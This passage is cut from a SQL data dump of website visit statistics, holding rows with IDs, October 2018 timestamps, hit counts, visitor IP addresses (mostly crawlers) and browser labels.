.29','chrome'),(316034,1539336525,2,2,0,0,'54.36.149.49','other'),(316035,1539336617,1,1,0,0,'62.205.134.182','msie'),(316036,1539336627,1,1,0,0,'54.36.148.187','other'),(316037,1539336770,1,1,0,0,'54.36.148.87','other'),(316038,1539337344,1,1,0,0,'54.36.148.250','other'),(316039,1539337362,1,1,0,0,'54.36.149.36','other'),(316040,1539337381,1,1,0,0,'66.249.64.30','chrome'),(316041,1539337468,1,1,0,0,'54.36.148.43','other'),(316042,1539337502,1,1,0,0,'54.36.148.27','other'),(316043,1539337582,1,1,0,0,'178.154.244.11','other'),(316044,1539337760,2,2,0,0,'216.244.66.241','other'),(316045,1539337866,1,1,0,0,'54.36.148.197','other'),(316046,1539337924,1,1,0,0,'91.196.178.73','chrome'),(316047,1539337978,1,1,0,0,'66.102.9.38','chrome'),(316048,1539338062,1,1,0,0,'54.36.148.239','other'),(316049,1539338174,1,1,0,0,'54.36.148.94','other'),(316050,1539338184,1,1,0,0,'13.66.139.0','other'),(316051,1539338305,1,1,0,0,'54.36.148.89','other'),(316052,1539338466,1,1,0,0,'54.36.149.14','other'),(316053,1539338825,1,1,0,0,'54.36.149.80','other'),(316054,1539339053,1,1,0,0,'54.36.149.2','other'),(316055,1539339077,1,1,0,0,'54.36.148.160','other'),(316056,1539339094,1,1,0,0,'54.36.148.254','other'),(316057,1539339453,1,1,0,0,'54.36.148.209','other'),(316058,1539339459,1,1,0,0,'46.229.168.141','other'),(316059,1539339731,1,1,0,0,'95.163.255.96','other'),(316060,1539339741,1,1,0,0,'180.76.15.134','other'),(316061,1539339799,2,2,0,0,'95.163.255.99','other'),(316062,1539339845,1,1,0,0,'8.29.198.27','other'),(316063,1539339871,1,1,0,0,'54.36.148.190','other'),(316064,1539340122,1,1,0,0,'54.36.148.169','other'),(316065,1539340141,1,1,0,0,'54.36.148.121','other'),(316066,1539340332,1,1,0,0,'54.36.149.14','other'),(316067,1539340425,1,1,0,0,'216.244.66.241','other'),(316068,1539340758,1,1,0,0,'66.249.64.28','chrome'),(316069,1539340837,2,2,0,0,'54.36.149.69','other'),(316070,1539341252,1,1,0,0,'54.36.148.171','other'),(316071,1539341336,1,1,0,0,'54.36.149.90','other'),(316072,1539341763,1,1,0,0,'54.36.148.160','other'),(316073,1539341811,1,1,0,0,'54.36.149.56','other'),(316074,1539341874,1,1,0,0,'54.36.148.19','other'),(316075,1539342054,1,1,0,0,'54.36.148.200','other'),(316076,1539342067,1,1,0,0,'54.36.148.70','other'),(316077,1539342074,1,1,0,0,'54.36.148.41','other'),(316078,1539342079,1,1,0,0,'54.36.148.69','other'),(316079,1539342364,1,1,0,0,'54.36.149.28','other'),(316080,1539342409,2,2,0,0,'54.224.73.62','other'),(316081,1539342484,1,1,0,0,'66.249.64.30','chrome'),(316082,1539342530,1,1,0,0,'144.76.81.72','other'),(316083,1539342609,1,1,0,0,'54.36.148.242','other'),(316084,1539342851,1,1,0,0,'54.36.148.188','other'),(316085,1539342880,2,2,0,0,'216.244.66.241','other'),(316086,1539342915,1,1,0,0,'54.36.148.93','other'),(316087,1539343155,1,1,0,0,'54.36.148.88','other'),(316088,1539343201,1,1,0,0,'54.36.148.15','other'),(316089,1539343498,1,1,0,0,'54.36.148.61','other'),(316090,1539343749,1,1,0,0,'54.36.148.126','other'),(316091,1539344044,1,1,0,0,'54.36.149.20','other'),(316092,1539344150,1,1,0,0,'54.36.149.103','other'),(316093,1539344251,1,1,0,0,'54.36.148.191','other'),(316095,1539344252,3,3,0,0,'66.249.64.30','chrome'),(316096,1539344348,2,2,0,0,'66.249.64.29','chrome'),(316097,1539344353,1,1,0,0,'66.249.64.28','chrome'),(316098,1539344459,1,1,0,0,'178.154.244.11','other'),(316099,1539345293,6,6,0,0,'216.244.66.241','other'),(316100,1539345639,1,1,0,0,'54.36.149.29','other'),(316101,1539345882,1,1,0,0,'8.29.198.26','other'),(316102,1539345922,1,1,0,0,'178.154.244.29','other'),(316103,1539345997,1,1,0,0,'54.36.149.24','other'),(316104,1539346030,1,1,0,0,'54.36.148.151','other'),(316105,1539346254,2,2,0,0,'178.154.244.11','other'),(316106,1539346255,1,1,0,0,'8.29.198.25','other'),(316107,1539346345,1,1,0,0,'54.36.149.43','other'),(316108,1539346376,1,1,0,0,'54.36.148.120','other'),(316109,1539346429,1,1,0,0,'54.36.148.142','other'),(316110,1539346468,1,1,0,0,'54.36.149.18','other'),(316111,1539346720,1,1,0,0,'54.36.148.51','other'),(316112,1539346745,1,1,0,0,'54.36.149.101','other'),(316113,1539346858,5,5,0,0,'178.154.244.29','other'),(316114,1539347334,1,1,0,0,'54.36.148.123','other'),(316115,1539347390,1,1,0,0,'66.249.64.61','chrome'),(316116,1539347505,1,1,0,0,'54.36.148.186','other'),(316117,1539347635,1,1,0,0,'54.36.148.49','other'),(316118,1539347955,5,5,0,0,'216.244.66.241','other'),(316119,1539348072,1,1,0,0,'178.154.244.29','other'),(316120,1539348263,5,5,0,0,'51.254.205.212','other'),(316121,1539348531,1,1,0,0,'54.36.148.96','other'),(316122,1539349099,1,1,0,0,'54.36.148.253','other'),(316123,1539349594,1,1,0,0,'54.36.148.80','other'),(316124,1539350285,1,1,0,0,'91.196.177.15','chrome'),(316125,1539350298,1,1,0,0,'54.36.148.146','other'),(316126,1539350371,1,1,0,0,'216.244.66.241','other'),(316127,1539350379,1,1,0,0,'54.36.148.170','other'),(316128,1539350662,1,1,0,0,'46.229.168.147','other'),(316129,1539350699,1,1,0,0,'8.29.198.25','other'),(316130,1539350759,1,1,0,0,'54.36.148.182','other'),(316131,1539350875,1,1,0,0,'54.36.148.110','other'),(316132,1539350915,2,2,0,0,'178.154.244.11','other'),(316133,1539350998,3,3,0,0,'66.249.64.29','chrome'),(316134,1539351895,1,1,0,0,'54.36.148.122','other'),(316135,1539351984,1,1,0,0,'54.36.148.78','other'),(316136,1539351986,1,1,0,0,'54.36.148.168','other'),(316137,1539351991,1,1,0,0,'54.36.149.30','other'),(316138,1539352116,1,1,0,0,'54.36.149.67','other'),(316139,1539352415,1,1,0,0,'40.77.167.19','other'),(316140,1539352620,1,1,0,0,'62.205.134.182','msie'),(316141,1539352923,2,2,0,0,'216.244.66.241','other'),(316142,1539353053,1,1,0,0,'54.36.149.20','other'),(316143,1539353195,1,1,0,0,'54.36.148.116','other'),(316144,1539353387,1,1,0,0,'54.36.148.182','other'),(316145,1539353499,1,1,0,0,'54.36.149.55','other'),(316146,1539353701,1,1,0,0,'66.249.64.29','chrome'),(316147,1539353846,1,1,0,0,'54.36.149.18','other'),(316148,1539354261,1,1,0,0,'54.36.149.80','other'),(316149,1539354430,1,1,0,0,'54.36.148.65','other'),(316150,1539354491,1,1,0,0,'54.36.149.85','other'),(316151,1539354533,1,1,0,0,'54.36.148.234','other'),(316152,1539354743,1,1,0,0,'54.36.149.84','other'),(316153,1539354815,1,1,0,0,'91.196.178.72','firefox'),(316154,1539355390,1,1,0,0,'54.36.148.175','other'),(316155,1539355579,3,3,0,0,'216.244.66.241','other'),(316156,1539355590,1,1,0,0,'54.36.148.129','other'),(316157,1539355801,1,1,0,0,'54.36.149.29','other'),(316158,1539356120,1,1,0,0,'54.36.148.72','other'),(316159,1539356361,1,1,0,0,'54.36.149.56','other'),(316160,1539356581,1,1,0,0,'54.36.148.128','other'),(316161,1539356612,1,1,0,0,'40.77.167.173','other'),(316162,1539356613,1,1,0,0,'54.36.149.22','other'),(316163,1539356701,1,1,0,0,'54.36.149.19','other'),(316164,1539356721,2,2,0,0,'8.29.198.27','other'),(316165,1539356724,1,1,0,0,'54.36.149.8','other'),(316166,1539356755,1,1,0,0,'54.162.179.90','other'),(316167,1539356819,1,1,0,0,'54.36.148.173','other'),(316168,1539357128,1,1,0,0,'54.36.149.15','other'),(316169,1539357251,1,1,0,0,'51.255.65.46','other'),(316170,1539357554,1,1,0,0,'54.36.148.49','other'),(316171,1539357646,1,1,0,0,'54.36.148.225','other'),(316172,1539357732,1,1,0,0,'54.36.148.42','other'),(316173,1539357866,1,1,0,0,'178.154.244.11','other'),(316174,1539357998,2,2,0,0,'178.154.244.29','other'),(316175,1539358020,1,1,0,0,'54.36.149.25','other'),(316176,1539358300,1,1,0,0,'37.54.23.36','chrome'),(316177,1539358442,1,1,0,0,'54.36.148.216','other'),(316178,1539358491,1,1,0,0,'216.244.66.241','other'),(316179,1539358649,1,1,0,0,'54.36.149.5','other'),(316180,1539358683,1,1,0,0,'54.36.148.191','other'),(316181,1539358744,1,1,0,0,'66.249.64.29','chrome'),(316182,1539358816,1,1,0,0,'66.249.64.30','chrome'),(316183,1539358820,1,1,0,0,'54.36.149.85','other'),(316184,1539358866,2,2,0,0,'54.162.179.90','other'),(316185,1539358979,1,1,0,0,'54.36.148.91','other'),(316186,1539359483,1,1,0,0,'178.154.244.29','other'),(316187,1539359536,1,1,0,0,'54.36.148.222','other'),(316188,1539359687,1,1,0,0,'54.36.149.94','other'),(316189,1539359735,1,1,0,0,'54.36.148.151','other'),(316190,1539359850,1,1,0,0,'144.76.96.236','other'),(316191,1539360235,1,1,0,0,'54.36.148.215','other'),(316192,1539360357,1,1,0,0,'54.36.148.237','other'),(316193,1539360636,1,1,0,0,'54.36.148.16','other'),(316194,1539360775,1,1,0,0,'37.54.23.36','chrome'),(316195,1539360796,1,1,0,0,'54.36.148.75','other'),(316196,1539360809,1,1,0,0,'54.162.179.90','other'),(316197,1539360833,1,1,0,0,'54.36.148.23','other'),(316198,1539360920,1,1,0,0,'54.36.148.88','other'),(316199,1539360992,1,1,0,0,'54.36.149.29','other'),(316200,1539361105,1,1,0,0,'216.244.66.241','other'),(316201,1539361247,1,1,0,0,'54.36.149.39','other'),(316202,1539361275,1,1,0,0,'92.113.156.120','chrome'),(316203,1539361360,1,1,0,0,'82.145.208.111','other'),(316204,1539361422,1,1,0,0,'54.36.148.20','other'),(316205,1539361543,1,1,0,0,'8.29.198.26','other'),(316206,1539361799,1,1,0,0,'46.242.126.161','msie'),(316207,1539361911,1,1,0,0,'37.54.23.36','chrome'),(316208,1539362423,1,1,0,0,'54.36.149.80','other'),(316209,1539362546,1,1,0,0,'54.36.149.49','other'),(316210,1539362868,1,1,0,0,'54.36.148.242','other'),(316211,1539362952,1,1,0,0,'54.36.149.86','other'),(316212,1539363001,1,1,0,0,'54.36.148.136','other'),(316213,1539363055,1,1,0,0,'157.55.39.152','other'),(316214,1539363060,1,1,0,0,'54.36.148.114','other'),(316215,1539363367,1,1,0,0,'54.36.148.176','other'),(316216,1539363421,1,1,0,0,'54.36.149.39','other'),(316217,1539363528,1,1,0,0,'54.36.148.45','other'),(316218,1539363606,1,1,0,0,'54.36.148.59','other'),(316219,1539363679,1,1,0,0,'54.36.148.207','other'),(316220,1539363774,1,1,0,0,'54.36.148.13','other'),(316221,1539364207,1,1,0,0,'54.36.148.221','other'),(316222,1539364756,1,1,0,0,'54.36.149.62','other'),(316223,1539365332,1,1,0,0,'178.154.244.29','other'),(316224,1539365357,1,1,0,0,'54.162.179.90','other'),(316225,1539365413,1,1,0,0,'54.36.148.217','other'),(316226,1539365486,1,1,0,0,'54.36.149.15','other'),(316227,1539365651,1,1,0,0,'54.36.148.32','other'),(316228,1539365834,1,1,0,0,'54.36.149.52','other'),(316229,1539366021,1,1,0,0,'54.36.148.30','other'),(316230,1539366025,1,1,0,0,'54.36.148.21','other'),(316231,1539366175,1,1,0,0,'54.36.149.93','other'),(316232,1539366183,1,1,0,0,'46.229.168.138','other'),(316233,1539366284,1,1,0,0,'54.36.148.211','other'),(316234,1539366353,1,1,0,0,'54.36.149.3','other'),(316235,1539366475,1,1,0,0,'54.36.148.226','other'),(316236,1539366546,1,1,0,0,'46.211.10.140','chrome'),(316237,1539366754,1,1,0,0,'54.36.148.206','other'),(316238,1539366782,1,1,0,0,'54.36.149.72','other'),(316239,1539367176,1,1,0,0,'54.36.148.161','other'),(316240,1539367221,2,2,0,0,'91.209.11.236','other'),(316241,1539367236,1,1,0,0,'54.36.148.29','other'),(316242,1539367372,1,1,0,0,'40.77.167.92','other'),(316243,1539367374,1,1,0,0,'54.36.149.7','other'),(316244,1539367559,1,1,0,0,'54.36.148.130','other'),(316245,1539367654,1,1,0,0,'54.36.149.65','other'),(316246,1539367884,1,1,0,0,'54.36.148.21','other'),(316247,1539367986,1,1,0,0,'54.36.148.232','other'),(316248,1539368079,1,1,0,0,'54.36.148.88','other'),(316249,1539368132,5,5,0,0,'157.55.39.152','other'),(316250,1539368147,2,2,0,0,'8.29.198.25','other'),(316251,1539368186,12,12,0,0,'40.77.167.19','other'),(316252,1539368278,2,2,0,0,'216.244.66.241','other'),(316253,1539368375,1,1,0,0,'66.249.64.28','chrome'),(316254,1539368406,1,1,0,0,'180.76.15.160','other'),(316255,1539368492,1,1,0,0,'91.209.11.236','other'),(316256,1539368525,7,7,0,0,'40.77.167.173','other'),(316257,1539368581,1,1,0,0,'54.36.148.164','other'),(316258,1539368772,1,1,0,0,'54.36.148.140','other'),(316259,1539368906,1,1,0,0,'54.36.148.228','other'),(316260,1539368992,1,1,0,0,'95.163.255.94','other'),(316261,1539369077,1,1,0,0,'54.36.148.144','other'),(316262,1539369238,1,1,0,0,'54.36.149.69','other'),(316263,1539369250,1,1,0,0,'54.36.148.45','other'),(316264,1539369566,1,1,0,0,'54.36.148.30','other'),(316265,1539370148,1,1,0,0,'95.163.255.96','other'),(316266,1539370224,1,1,0,0,'54.36.148.128','other'),(316267,1539370272,2,2,0,0,'91.209.11.236','other'),(316268,1539370406,1,1,0,0,'180.76.15.151','other'),(316269,1539370431,1,1,0,0,'178.154.244.11','other'),(316270,1539370747,1,1,0,0,'54.36.149.55','other'),(316271,1539370772,1,1,0,0,'54.36.149.31','other'),(316272,1539371061,1,1,0,0,'54.36.148.218','other'),(316273,1539371197,1,1,0,0,'62.205.134.182','msie'),(316274,1539371343,1,1,0,0,'216.244.66.241','other'),(316275,1539371377,1,1,0,0,'54.36.148.40','other'),(316276,1539371423,1,1,0,0,'54.36.148.89','other'),(316277,1539371498,1,1,0,0,'91.196.178.182','chrome'),(316278,1539371544,1,1,0,0,'91.209.11.236','other'),(316279,1539371785,1,1,0,0,'54.36.148.58','other'),(316280,1539371889,1,1,0,0,'54.36.148.28','other'),(316281,1539372072,1,1,0,0,'178.154.244.29','other'),(316282,1539372076,1,1,0,0,'178.154.244.11','other'),(316283,1539372098,1,1,0,0,'54.36.149.55','other'),(316284,1539372314,1,1,0,0,'54.36.149.11','other'),(316285,1539372385,1,1,0,0,'8.29.198.27','other'),(316286,1539372433,1,1,0,0,'54.36.148.180','other'),(316287,1539372641,1,1,0,0,'54.36.148.156','other'),(316288,1539372793,1,1,0,0,'54.36.148.148','other'),(316289,1539373043,1,1,0,0,'193.106.30.98','firefox'),(316290,1539373279,1,1,0,0,'54.36.148.38','other'),(316291,1539373969,1,1,0,0,'54.36.148.114','other'),(316292,1539373989,1,1,0,0,'54.36.148.213','other'),(316293,1539374015,1,1,0,0,'54.36.148.26','other'),(316294,1539374352,1,1,0,0,'54.36.149.107','other'),(316295,1539374519,1,1,0,0,'54.36.148.231','other'),(316296,1539374641,1,1,0,0,'216.244.66.241','other'),(316297,1539374783,1,1,0,0,'18.194.152.205','other'),(316298,1539374860,1,1,0,0,'54.36.148.216','other'),(316299,1539375162,1,1,0,0,'66.249.64.30','chrome'),(316300,1539375170,1,1,0,0,'54.36.148.75','other'),(316301,1539375189,1,1,0,0,'178.154.244.29','other'),(316302,1539375218,1,1,0,0,'54.36.148.105','other'),(316303,1539375515,1,1,0,0,'54.36.148.114','other'),(316304,1539375730,1,1,0,0,'54.36.148.210','other'),(316305,1539376158,1,1,0,0,'54.36.149.5','other'),(316306,1539376308,1,1,0,0,'54.36.148.214','other'),(316307,1539376345,2,2,0,0,'178.154.244.29','other'),(316308,1539376586,1,1,0,0,'54.36.148.231','other'),(316309,1539376864,1,1,0,0,'213.180.203.40','other'),(316310,1539376970,1,1,0,0,'87.250.224.64','other'),(316311,1539377030,1,1,0,0,'54.36.149.12','other'),(316312,1539377052,1,1,0,0,'54.36.148.81','other'),(316313,1539377068,1,1,0,0,'54.36.148.179','other'),(316314,1539377178,1,1,0,0,'54.36.149.96','other'),(316315,1539377190,1,1,0,0,'51.255.65.46','other'),(316316,1539377209,1,1,0,0,'54.36.148.73','other'),(316317,1539377366,1,1,0,0,'54.36.148.221','other'),(316318,1539377520,1,1,0,0,'54.36.149.45','other'),(316319,1539377540,1,1,0,0,'54.36.149.46','other'),(316320,1539377703,1,1,0,0,'54.36.149.22','other'),(316321,1539377822,1,1,0,0,'66.249.64.199','chrome'),(316322,1539377829,1,1,0,0,'54.36.148.102','other'),(316323,1539377921,1,1,0,0,'178.154.244.29','other'),(316324,1539378034,1,1,0,0,'66.249.64.61','chrome'),(316325,1539378164,1,1,0,0,'54.36.148.115','other'),(316326,1539378208,1,1,0,0,'54.36.148.10','other'),(316327,1539378214,1,1,0,0,'54.36.148.105','other'),(316328,1539378480,1,1,0,0,'54.36.148.100','other'),(316329,1539378582,1,1,0,0,'216.244.66.241','other'),(316330,1539378670,1,1,0,0,'54.36.148.122','other'),(316331,1539378752,1,1,0,0,'54.36.148.116','other'),(316332,1539379128,2,2,0,0,'8.29.198.25','other'),(316333,1539379132,1,1,0,0,'54.36.148.197','other'),(316334,1539379694,1,1,0,0,'54.36.148.96','other'),(316335,1539379974,1,1,0,0,'54.36.148.176','other'),(316336,1539379985,1,1,0,0,'54.36.148.95','other'),(316337,1539380036,1,1,0,0,'54.36.148.133','other'),(316338,1539380083,1,1,0,0,'216.244.66.241','other'),(316339,1539380406,1,1,0,0,'54.36.148.161','other'),(316340,1539380723,1,1,0,0,'54.36.148.71','other'),(316341,1539381104,1,1,0,0,'54.36.148.157','other'),(316342,1539381378,1,1,0,0,'54.36.148.114','other'),(316343,1539381708,1,1,0,0,'216.244.66.241','other'),(316344,1539382041,1,1,0,0,'54.36.148.231','other'),(316345,1539382057,1,1,0,0,'46.229.168.136','other'),(316346,1539382515,1,1,0,0,'54.36.148.215','other'),(316347,1539382949,1,1,0,0,'54.36.148.69','other'),(316348,1539383034,1,1,0,0,'54.36.148.103','other'),(316349,1539383112,1,1,0,0,'54.36.148.230','other'),(316350,1539383212,1,1,0,0,'8.29.198.26','other'),(316351,1539383496,1,1,0,0,'66.249.64.195','chrome'),(316352,1539383999,1,1,0,0,'54.36.149.28','other'),(316353,1539384586,2,2,0,0,'66.249.64.195','chrome'),(316354,1539384744,1,1,0,0,'54.36.149.50','other'),(316355,1539384965,1,1,0,0,'185.227.68.78','other'),(316356,1539385174,1,1,0,0,'54.36.149.45','other'),(316357,1539385354,1,1,0,0,'66.249.64.199','chrome'),(316358,1539385492,1,1,0,0,'54.36.148.195','other'),(316359,1539385648,1,1,0,0,'66.249.64.195','chrome'),(316360,1539385772,1,1,0,0,'54.36.149.58','other'),(316361,1539385929,1,1,0,0,'54.36.149.72','other'),(316362,1539386050,1,1,0,0,'54.36.148.152','other'),(316363,1539386178,1,1,0,0,'54.36.148.79','other'),(316364,1539386219,1,1,0,0,'54.36.148.253','other'),(316365,1539386403,1,1,0,0,'54.36.148.204','other'),(316366,1539386530,1,1,0,0,'54.36.148.118','other'),(316367,1539386645,1,1,0,0,'66.249.64.199','chrome'),(316368,1539386976,1,1,0,0,'54.36.148.216','other'),(316369,1539386998,1,1,0,0,'54.36.148.165','other'),(316370,1539387216,1,1,0,0,'54.36.149.19','other'),(316371,1539387855,1,1,0,0,'54.36.149.14','other'),(316372,1539387961,1,1,0,0,'54.36.148.156','other'),(316373,1539388172,1,1,0,0,'54.36.148.66','other'),(316374,1539388276,1,1,0,0,'54.36.148.168','other'),(316375,1539388492,1,1,0,0,'54.36.149.29','other'),(316376,1539388576,1,1,0,0,'54.36.149.49','other'),(316377,1539388844,1,1,0,0,'66.249.64.201','chrome'),(316378,1539388908,1,1,0,0,'54.36.149.101','other'),(316379,1539389222,1,1,0,0,'54.165.59.7','other'),(316380,1539389478,1,1,0,0,'54.36.148.135','other'),(316381,1539389607,1,1,0,0,'54.36.148.49','other'),(316382,1539389801,1,1,0,0,'54.36.148.201','other'),(316383,1539389968,1,1,0,0,'8.29.198.26','other'),(316384,1539390016,1,1,0,0,'95.163.255.99','other'),(316385,1539390126,1,1,0,0,'54.36.148.23','other'),(316386,1539390244,1,1,0,0,'178.255.215.94','other'),(316387,1539390257,1,1,0,0,'8.29.198.27','other'),(316388,1539390266,1,1,0,0,'54.36.148.226','other'),(316389,1539390381,1,1,0,0,'54.36.149.81','other'),(316390,1539390512,1,1,0,0,'54.36.148.28','other'),(316391,1539390561,1,1,0,0,'54.36.149.95','other'),(316392,1539390774,1,1,0,0,'54.36.148.89','other'),(316393,1539390811,1,1,0,0,'54.36.149.84','other'),(316394,1539390898,1,1,0,0,'54.36.148.149','other'),(316395,1539390942,1,1,0,0,'54.36.148.161','other'),(316396,1539391188,1,1,0,0,'54.36.148.95','other'),(316397,1539391398,1,1,0,0,'54.36.148.38','other'),(316398,1539391781,1,1,0,0,'216.244.66.241','other'),(316399,1539391896,1,1,0,0,'54.36.149.94','other'),(316400,1539392009,1,1,0,0,'54.36.148.78','other'),(316401,1539392014,1,1,0,0,'54.36.148.105','other'),(316402,1539392065,1,1,0,0,'54.36.149.97','other'),(316403,1539392083,1,1,0,0,'54.36.148.41','other'),(316404,1539392189,1,1,0,0,'54.36.149.91','other'),(316405,1539392248,1,1,0,0,'54.36.149.1','other'),(316406,1539392311,1,1,0,0,'54.36.148.64','other'),(316407,1539392572,1,1,0,0,'54.36.148.204','other'),(316408,1539392740,1,1,0,0,'54.36.149.14','other'),(316409,1539392811,1,1,0,0,'66.249.64.199','chrome'),(316410,1539393032,1,1,0,0,'54.36.148.154','other'),(316411,1539393046,1,1,0,0,'54.36.149.73','other'),(316412,1539393212,12,12,0,0,'173.234.159.250','other'),(316413,1539393319,1,1,0,0,'54.36.148.78','other'),(316414,1539393484,1,1,0,0,'54.36.148.98','other'),(316415,1539393660,1,1,0,0,'54.36.149.24','other'),(316416,1539393680,1,1,0,0,'54.36.149.75','other'),(316417,1539393808,1,1,0,0,'54.36.148.71','other'),(316418,1539394025,1,1,0,0,'66.249.64.199','chrome'),(316419,1539394042,1,1,0,0,'8.29.198.25','other'),(316420,1539394399,1,1,0,0,'51.255.65.46','other'),(316421,1539394449,1,1,0,0,'216.244.66.241','other'),(316422,1539394758,1,1,0,0,'54.36.148.97','other'),(316423,1539394845,1,1,0,0,'54.36.148.218','other'),(316424,1539394982,1,1,0,0,'54.36.148.202','other'),(316425,1539395368,1,1,0,0,'54.36.149.47','other'),(316426,1539395823,1,1,0,0,'54.36.148.200','other'),(316427,1539395945,1,1,0,0,'54.36.148.239','other'),(316428,1539395971,1,1,0,0,'54.36.148.38','other'),(316429,1539396033,1,1,0,0,'54.36.149.25','other'),(316430,1539396542,1,1,0,0,'54.36.149.105','other'),(316431,1539396779,1,1,0,0,'54.36.148.234','other'),(316432,1539397416,1,1,0,0,'54.36.148.235','other'),(316433,1539397619,1,1,0,0,'54.36.148.117','other'),(316434,1539397773,1,1,0,0,'54.36.148.192','other'),(316435,1539398123,1,1,0,0,'54.36.148.221','other'),(316436,1539398409,1,1,0,0,'54.36.149.97','other'),(316437,1539398536,1,1,0,0,'54.36.149.55','other'),(316438,1539398564,1,1,0,0,'180.76.15.152','other'),(316439,1539398789,1,1,0,0,'54.36.149.80','other'),(316440,1539398819,1,1,0,0,'54.36.148.16','other'),(316441,1539398831,1,1,0,0,'216.244.66.241','other'),(316442,1539398886,2,2,0,0,'66.249.64.199','chrome'),(316443,1539398890,1,1,0,0,'66.249.64.61','chrome'),(316444,1539398986,1,1,0,0,'54.36.149.77','other'),(316445,1539399064,2,2,0,0,'54.36.148.236','other'),(316446,1539399387,1,1,0,0,'66.249.64.195','chrome'),(316447,1539399612,1,1,0,0,'54.36.148.150','other'),(316448,1539399712,1,1,0,0,'54.36.148.18','other'),(316449,1539399792,1,1,0,0,'54.36.148.38','other'),(316450,1539399912,1,1,0,0,'95.163.255.92','other'),(316451,1539399992,1,1,0,0,'54.36.148.64','other'),(316452,1539400022,1,1,0,0,'54.36.148.106','other'),(316453,1539400269,1,1,0,0,'54.36.149.59','other'),(316454,1539400350,1,1,0,0,'54.36.148.226','other'),(316455,1539400412,1,1,0,0,'46.229.168.148','other'),(316456,1539400564,1,1,0,0,'180.76.15.159','other'),(316457,1539400703,1,1,0,0,'51.255.65.46','other'),(316458,1539400809,2,2,0,0,'8.29.198.26','other'),(316459,1539401089,1,1,0,0,'54.36.148.24','other'),(316460,1539401152,1,1,0,0,'95.163.255.93','other'),(316461,1539401188,1,1,0,0,'66.249.64.199','chrome'),(316462,1539401235,1,1,0,0,'54.36.148.67','other'),(316463,1539401249,1,1,0,0,'54.36.148.54','other'),(316464,1539401642,1,1,0,0,'54.36.148.35','other'),(316465,1539401753,1,1,0,0,'54.36.148.52','other'),(316466,1539401848,1,1,0,0,'54.36.148.97','other'),(316467,1539402169,1,1,0,0,'95.132.3.18','other'),(316468,1539402171,1,1,0,0,'54.36.148.42','other'),(316469,1539402692,1,1,0,0,'54.36.148.217','other'),(316470,1539402907,1,1,0,0,'54.36.148.32','other'),(316471,1539402950,1,1,0,0,'54.36.149.50','other'),(316472,1539402994,1,1,0,0,'54.36.148.138','other'),(316473,1539403463,1,1,0,0,'54.36.149.83','other'),(316474,1539403572,1,1,0,0,'54.36.149.59','other'),(316475,1539403950,1,1,0,0,'54.36.148.67','other'),(316476,1539404206,1,1,0,0,'54.36.148.252','other'),(316477,1539404213,1,1,0,0,'54.36.149.30','other'),(316478,1539404389,1,1,0,0,'54.36.148.153','other'),(316479,1539404538,1,1,0,0,'199.58.86.211','other'),(316480,1539404557,1,1,0,0,'54.36.148.249','other'),(316481,1539404644,1,1,0,0,'54.36.148.230','other'),(316482,1539404654,2,2,0,0,'216.244.66.241','other'),(316483,1539404759,1,1,0,0,'54.36.149.42','other'),(316484,1539404808,1,1,0,0,'66.249.64.195','chrome'),(316485,1539404875,1,1,0,0,'8.29.198.27','other'),(316486,1539405200,1,1,0,0,'54.36.149.48','other'),(316487,1539405208,1,1,0,0,'54.36.148.50','other'),(316488,1539405325,1,1,0,0,'54.36.148.125','other'),(316489,1539405494,1,1,0,0,'95.163.255.98','other'),(316490,1539405550,1,1,0,0,'54.36.148.228','other'),(316491,1539405560,1,1,0,0,'54.36.149.39','other'),(316492,1539405787,1,1,0,0,'54.36.149.5','other'),(316493,1539406024,1,1,0,0,'66.249.64.201','chrome'),(316494,1539406078,1,1,0,0,'54.36.148.224','other'),(316495,1539406153,2,2,0,0,'66.249.64.195','chrome'),(316496,1539406254,1,1,0,0,'46.229.168.137','other'),(316497,1539406320,3,3,0,0,'216.244.66.241','other'),(316498,1539406492,1,1,0,0,'54.36.148.120','other'),(316499,1539406559,2,2,0,0,'95.213.141.126','opera'),(316500,1539406899,1,1,0,0,'95.163.255.95','other'),(316501,1539407256,1,1,0,0,'54.36.148.91','other'),(316502,1539407383,1,1,0,0,'54.36.148.130','other'),(316503,1539407472,1,1,0,0,'54.36.149.92','other'),(316504,1539407501,1,1,0,0,'54.36.148.53','other'),(316505,1539407617,1,1,0,0,'54.36.148.175','other'),(316506,1539407810,1,1,0,0,'54.36.148.215','other'),(316507,1539408159,1,1,0,0,'66.249.64.195','chrome'),(316508,1539408205,1,1,0,0,'54.36.149.15','other'),(316509,1539408298,1,1,0,0,'54.36.148.222','other'),(316510,1539408469,1,1,0,0,'66.249.64.199','chrome'),(316511,1539408836,1,1,0,0,'54.36.149.74','other'),(316512,1539408964,1,1,0,0,'54.36.149.62','other'),(316513,1539408994,1,1,0,0,'54.36.148.189','other'),(316514,1539409255,1,1,0,0,'54.36.148.105','other'),(316515,1539409332,1,1,0,0,'54.36.148.252','other'),(316516,1539409434,1,1,0,0,'54.36.148.81','other'),(316517,1539409459,3,3,0,0,'216.244.66.241','other'),(316518,1539409681,1,1,0,0,'173.208.130.202','other'),(316519,1539409714,1,1,0,0,'66.249.64.195','chrome'),(316520,1539409718,1,1,0,0,'66.249.64.199','chrome'),(316521,1539409778,1,1,0,0,'54.36.148.172','other'),(316522,1539409786,1,1,0,0,'91.250.36.64','chrome'),(316523,1539410203,1,1,0,0,'54.36.148.236','other'),(316524,1539410521,1,1,0,0,'66.249.64.201','chrome'),(316525,1539410631,1,1,0,0,'54.36.148.251','other'),(316526,1539410693,1,1,0,0,'157.55.39.152','other'),(316527,1539410806,1,1,0,0,'54.36.149.13','other'),(316528,1539411308,1,1,0,0,'54.36.148.231','other'),(316529,1539411310,1,1,0,0,'66.249.64.59','chrome'),(316530,1539411652,2,2,0,0,'8.29.198.26','other'),(316531,1539411698,1,1,0,0,'54.36.149.75','other'),(316532,1539411761,1,1,0,0,'87.250.224.47','other'),(316533,1539411778,1,1,0,0,'66.249.64.199','chrome'),(316534,1539411801,1,1,0,0,'54.36.149.62','other'),(316535,1539412085,1,1,0,0,'51.255.65.46','other'),(316536,1539412479,1,1,0,0,'95.163.255.92','other'),(316537,1539412554,2,2,0,0,'66.249.64.195','chrome'),(316538,1539412946,1,1,0,0,'54.36.149.37','other'),(316539,1539412950,21,21,0,0,'5.9.156.20','other'),(316540,1539413234,1,1,0,0,'54.36.148.24','other'),(316541,1539413326,1,1,0,0,'54.36.149.40','other'),(316542,1539413357,1,1,0,0,'54.36.148.125','other'),(316543,1539413455,1,1,0,0,'54.36.149.24','other'),(316544,1539413567,1,1,0,0,'54.36.149.44','other'),(316545,1539413646,1,1,0,0,'54.36.148.50','other'),(316546,1539413680,1,1,0,0,'54.36.148.139','other'),(316547,1539413716,1,1,0,0,'54.36.148.81','other'),(316548,1539413783,1